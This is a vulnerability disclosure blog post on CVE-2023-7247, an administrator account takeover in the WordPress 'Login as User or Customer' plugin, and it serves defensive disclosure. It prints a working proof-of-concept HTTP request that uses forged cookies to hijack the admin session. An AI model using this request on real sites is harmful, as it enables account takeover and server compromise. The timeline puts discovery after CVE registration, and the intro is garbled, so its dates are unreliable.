During the testing of the plugin, a vulnerability was discovered that leads to the complete seizure of the administrator account, and subsequently the server itself. Imagine that I am an Administrator who switched to another account with a button, and at that moment an automatic screenshot was sent, every 5 seconds to the server, which sent a request to receive an admin cookie. Thus, the Administrator has lost his cookies, which means that an attacker can change the password at any time and perform RCE – which will lead to a complete capture

Main info:

CVECVE-2023-7247
PluginLogin as User or Customer <= 3.8
CriticalHigh
All Time19 234
Active installations1 000+
Publicly PublishedFebruary 20, 2023
Last UpdatedFebruary 20, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A2: Broken Authentication and Session Management
PoCYes
ExploitNo
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7247
https://wpscan.com/vulnerability/96b93253-31d0-4184-94b7-f1e18355d841/
Plugin Security Certification by CleanTalk

Timeline

October 31, 2023Plugin testing and vulnerability detection in the Login as User or Customer have been completed
October 31, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
February 20, 2023Registered CVE-2023-7247

Discovery of the Vulnerability

During testing of the “Login as User or Customer” plugin, a critical vulnerability was identified, enabling a complete takeover of the administrator account and potentially compromising the entire server. By exploiting a flaw in the plugin’s functionality, an attacker could intercept and manipulate sensitive data, including authentication tokens and cookies, leading to unauthorized access and control over the administrator account.

Understanding of Account Takeover attack’s

Account takeover refers to the unauthorized acquisition and control of a user account by an attacker. In the context of WordPress, such attacks can have severe consequences, allowing malicious actors to gain administrative privileges and manipulate website content, steal sensitive data, or even compromise the entire server. Real-world examples of account takeover incidents in WordPress include exploiting vulnerabilities in plugins, themes, or core functionalities to bypass authentication mechanisms and gain unauthorized access.

Exploiting the Account Takeover Vulnerability

To exploit the vulnerability in the “Login as User or Customer” plugin, an attacker can trigger a series of actions that lead to the unauthorized takeover of the administrator account. By initiating a request to switch to another user account via the plugin’s interface and intercepting the subsequent server-side requests, the attacker can manipulate authentication tokens and cookies to impersonate the administrator. This allows them to gain full control over the administrator’s privileges and execute malicious actions, such as changing passwords or performing remote code execution (RCE) attacks.

POC:

1) Admin should change account via button

2) Do request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0 
Accept: */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
X-Requested-With: XMLHttpRequest 
Content-Length: 27 
Origin: http://your_site
Connection: close 
Referer: http://your_site/wordpress/ 
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wploginas_new_user_id=2; loginas_old_user_id=1 
Sec-Fetch-Dest: empty 
Sec-Fetch-Mode: cors 
Sec-Fetch-Site: same-origin 
 
action=loginas_return_admin

___

The potential risks associated with this vulnerability are severe, as it enables attackers to gain unauthorized access to sensitive areas of a WordPress site and compromise its integrity. In real-world scenarios, attackers could exploit this vulnerability to steal confidential information, deface the website, distribute malware, or launch other malicious activities. Additionally, the ability to perform RCE attacks could result in the complete takeover of the server, leading to data breaches, service disruptions, and reputational damage.

Recommendations for Improved Security

To mitigate the risk of account takeover vulnerabilities like CVE-2023-7247, WordPress site administrators should take several proactive measures:

  • Regularly update plugins, themes, and the WordPress core to patch known vulnerabilities.
  • Conduct thorough security audits of plugins and themes before installation, ensuring they adhere to best practices and security standards.
  • Monitor user activity logs for suspicious behavior and promptly investigate any unauthorized access attempts.
  • Educate website administrators and users about the importance of strong passwords, safe browsing habits, and security best practices to prevent account compromise.

By following these recommendations, website administrators can strengthen the security posture of their WordPress sites and reduce the risk of account takeover vulnerabilities, such as the one identified in the “Login as User or Customer” plugin.

#WordPressSecurity #AccountTakeover #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

DMITRII I.

Create your CleanTalk account



By signing up, you agree with license. Have an account? Log in.
CVE-2023-7247 – Login as User or Customer – Admin Account Takeover – POC

Leave a Reply

Your email address will not be published. Required fields are marked *